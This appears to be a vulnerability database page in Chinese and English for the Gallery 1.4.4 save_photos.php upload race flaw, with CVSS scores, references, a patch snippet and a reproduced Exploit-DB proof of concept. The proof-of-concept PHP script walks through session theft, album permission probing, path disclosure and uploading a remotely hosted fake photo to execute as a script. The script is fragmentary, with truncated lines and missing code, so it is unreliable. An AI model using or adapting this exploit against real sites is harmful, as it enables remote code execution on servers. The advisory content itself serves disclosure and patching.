发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:28

[原文]The set_time_limit function in Gallery before 1.4.4_p2 deletes non-image files in a temporary directory every 30 seconds after they have been uploaded using save_photos.php, which allows remote attackers to upload and execute execute arbitrary scripts before they are deleted, if the temporary directory is under the web root.

[CNNVD]Gallery save_photos.php上传执行任意文件漏洞(CNNVD-200412-1010)

        aCiDBiTS报告如果临时目录是WEB可访问目录,拥有上传权限的远程验证用户就可以使用 'URL method'方法建立任意PHP文件,然后通过WEB执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  BID  10968
(PATCH)  GENTOO  GLSA-200409-05
(UNKNOWN)  XF  gallery-savephotos-file-upload(17021)
(UNKNOWN)  FULLDISC  20040817 Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept

- 漏洞信息

Gallery save_photos.php上传执行任意文件漏洞
高危 设计错误
2004-12-31 00:00:00 2006-08-17 00:00:00
        aCiDBiTS报告如果临时目录是WEB可访问目录,拥有上传权限的远程验证用户就可以使用 'URL method'方法建立任意PHP文件,然后通过WEB执行。

- 公告与补丁

        * aCiDBiTS提供如下第三方解决方案:
        save_photos.php, line 154:
        $file = $gallery->app->tmpDir . "/photo.$name";
        if(strlen($name)>20) $name=substr($name,strlen($name)-20);
        if (!acceptableFormat(strtolower(ereg_replace(".*\.([^\.]*)$", "\\1",
        $name)))) die( "\nInvalid file type!\n");
        $file = $gallery->app->tmpDir . "/photo.$name";

- 漏洞信息 (24383)

Gallery 1.4.4 Remote Server-Side Script Execution Vulnerability (EDBID:24383)
php webapps
2004-07-17 Verified
0 aCiDBiTS
N/A [点击下载]

A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function. 

The issue presents itself becuase the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.

Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well.

This is the content of galfakeimg.php. It has to be placed in a
remote web directory accessible by the gallery script.

echo "<?php
for($x=0;$x<65535;$x++) echo " \n";


define( XEC_TIMEOUT, 5);

echo "+--------------------------------------------------------------+\n|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
aCiDBiTS 17-August-2004

if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "[+] Obtaining PHPSESSID ... \n ";
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
echo $phps;

echo "\n\n[+] Getting album names ...\n ";
$webc=get_web($host, 0, $phps);
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
echo $album[$nalbum]." ";
if(!$nalbum) die(" Failed!\n\n");

echo "\n\n[+] Searching an album with permissions to add photos ...";
foreach( $album as $temp){
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0, $phps);
$webc=send_post( $host."save_photos.php",
urlencode("urls[]=".$host."&setCaption=1"), $phps);
echo "\n ".$temp." -> ";
if( ereg( "You are no allowed to perform this action", $webc) )
echo "No";
else {
echo "Yes";
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
echo "\n Using: ".$walbum;

echo "\n\n[+] Getting gallery & temporal directory paths ...";
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
for($x=0;$x<256;$x++) $temp.='a';
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1", $phps);
echo "\n Temporal directory: ".$tmpd;
$temp=explode("resource in <b>",$webc);
echo "\n Gallery directory: ".$scrptd;

if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
gallery's webtree. Can't continue.\n\n" );

echo "\n\n[+] Uploading $sname and executing it ...";
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,

echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\//||\\\\\n\n");

function get_web($url, $h, $cookie)
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, $h);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;

function send_post($url,$data, $cookie)
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_TIMEOUT, XEC_TIMEOUT) ;
$data=curl_exec ($ch);
curl_close ($ch);
return $data;

- 漏洞信息

Gallery save_photos.php Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

Gallery contains a flaw inside save_photos.php that will allow an attacker to upload arbitrary PHP script. The problem is that if the temporary directory is web-accessible, authenticated users with upload privileges may upload arbitrary PHP scripts which may then be executed. The script times out in 30 seconds if no more data is uploaded but in that 30 seconds an attacker can execute their uploaded PHP file.

- 时间线

2004-08-19 Unknow
2004-08-19 Unknow

- 解决方案

Upgrade to version 1.4.4-p11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者